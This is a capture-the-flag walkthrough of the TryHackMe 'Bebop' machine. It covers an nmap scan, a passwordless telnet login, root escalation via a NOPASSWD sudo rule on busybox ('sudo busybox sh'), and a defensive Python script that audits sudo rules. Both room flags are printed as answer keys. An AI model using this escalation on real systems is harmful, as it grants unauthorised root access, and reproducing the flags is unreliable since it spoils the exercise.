[TryHackMe] Bebop

Today we are going to hack the TryHackMe machine called Bebop. You can download it from the following link: Bebop


Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A 10.10.22.21
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-17 14:24 CEST
Nmap scan report for 10.10.22.21
Host is up (0.050s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey: 
|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open  telnet  BSD-derived telnetd
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.52 seconds
We see that the telnet port is open. Let's try to connect.

~ > telnet 10.10.22.21
Trying 10.10.22.21...
Connected to 10.10.22.21.
Escape character is '^]'.
login:
It asks for a login. Since the room's landing page told us we had been assigned the codename "pilot", we try pilot :)

login: pilot
Last login: Mon Aug 17 12:25:35 from ip-10-9-24-208.eu-west-1.compute.internal
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
Want to see how much virtual memory you're using? Just type "swapinfo" to
be shown information about the usage of your swap partitions.
[pilot@freebsd ~]$ 
We are logged in without needing a password!

user.txt



[pilot@freebsd ~]$ ls
user.txt
[pilot@freebsd ~]$ cat user.txt
THM{r3m0v3_b3f0r3_fl16h7}

Privilege Escalation


Now that we are in, we explore the system a bit and check whether we can do anything with "sudo".

[pilot@freebsd ~]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
We can run busybox as root without a password, which we can use to escalate privileges.

[pilot@freebsd ~]$ sudo busybox sh
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Root!
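
From the defender's side, the sudo rule above is the kind of entry an audit should catch. The following is an added example, not part of the original write-up: it parses `sudo -l` output and reports rules that grant a shell-capable program. The function name, the SHELL_CAPABLE list and the last sample rule are assumptions made for illustration.

```python
import os
import re

# Constructed, non-exhaustive list of programs that can spawn a shell or run
# arbitrary commands (an assumption for this example; extend it for your site).
SHELL_CAPABLE = {"busybox", "sh", "bash", "csh", "tcsh", "zsh", "env", "python", "perl"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<spec>.+)$")
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")

# The first two lines are the output shown above; the last rule is constructed.
SAMPLE = """\
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
    (root) /usr/sbin/service sshd restart
"""


def audit_sudo_listing(listing):
    """Return (runas, command, nopasswd) for each risky rule in `sudo -l` output."""
    findings = []
    for line in listing.splitlines():
        rule = RULE_RE.match(line)
        if not rule:
            continue  # header, Defaults entries, blank lines
        nopasswd = False  # tags persist across the comma-separated command list
        for item in rule.group("spec").split(","):
            item = item.strip()
            tags = TAG_RE.match(item)
            if tags:
                names = re.findall(r"[A-Z_]+", tags.group(0))
                if "NOPASSWD" in names:
                    nopasswd = True
                elif "PASSWD" in names:
                    nopasswd = False
                item = item[tags.end():].strip()
            if not item:
                continue
            program = os.path.basename(item.split()[0])
            program = re.sub(r"[\d.]+$", "", program)  # python3.9 -> python
            if item == "ALL" or program in SHELL_CAPABLE:
                findings.append((rule.group("runas"), item, nopasswd))
    return findings


if __name__ == "__main__":
    for runas, command, nopasswd in audit_sudo_listing(SAMPLE):
        auth = "without a password" if nopasswd else "with a password"
        print(f"RISK: {command} runnable as {runas} {auth}")
```

A rule that hands a multi-call binary such as busybox to an unprivileged user is equivalent to granting a root shell, so the fix is to remove the rule or restrict it to the specific, non-interactive command that is actually needed.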

root.txt


Now, as root, we look at the flag...

# cd /root
# ls
.bash_history	.cshrc		.history	.k5login	.login		
.profile	root.txt
# cat root.txt 
THM{h16hw4y_70_7h3_d4n63r_z0n3}

End


With this, we have finished the machine :)